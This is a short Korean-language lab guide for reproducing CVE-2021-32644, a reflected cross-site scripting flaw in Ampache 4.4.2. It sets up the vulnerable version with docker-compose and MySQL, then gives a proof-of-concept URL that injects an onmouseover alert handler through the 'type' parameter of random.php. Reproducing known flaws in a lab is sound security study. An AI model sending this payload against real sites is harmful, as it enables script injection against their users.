위 취약점은 Ampache 4.4.3 이전 버전까지 영향을 주었던 XSS 취약점입니다. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
설치를 진행할 때, docker-compose.yml 파일에서 포트포워딩을 진행해주시기 바랍니다. 현재 설치하는 Ampache 버전은 4.4.2 입니다.
$docker-compose up
http://[web-server ip]:port/로 이동합니다.
http://[web-server ip]:port/로 이동합니다.
아래 사진과 같이 mysql DB를 세팅합니다.
아래 PoC를 삽입하면 XSS 취약점이 발생하는 것을 볼 수 있습니다.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html